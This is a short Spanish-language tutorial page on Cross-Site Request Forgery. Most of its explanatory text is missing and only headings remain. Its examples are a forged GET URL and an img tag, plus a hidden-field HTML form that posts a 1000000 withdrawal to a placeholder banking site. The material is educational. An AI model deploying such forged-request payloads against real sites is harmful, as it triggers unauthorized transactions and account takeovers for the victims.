Cross-Site Request Forgery (CSRF)
Definición
Ejemplos:
http://bankingsite.com/transfer-money?amount=1000000<img src=”http://bankingsite.com/transfer-money?amount=1000000" /><html>
<body>
<form action="http://bankingsite.com/transfer-money" method="post">
<input type="hidden" name="Transaction" value="withdraw" />
<input type="hidden" name="Amount" value="1000000" />
<input type="submit" value="Click"/>
</form>
</body>
</html>¿Cuál es el impacto del CSRF?
Ejemplos reales
Caso 1: DOS via CSRF

Caso 2: Account Take Over via CSRF (Por chat de WhatsApp)


¿Qué está haciendo este payload?

Caso 3: Account Take over via CSRF + robo de token anti-csrf.


Recursos
Última actualización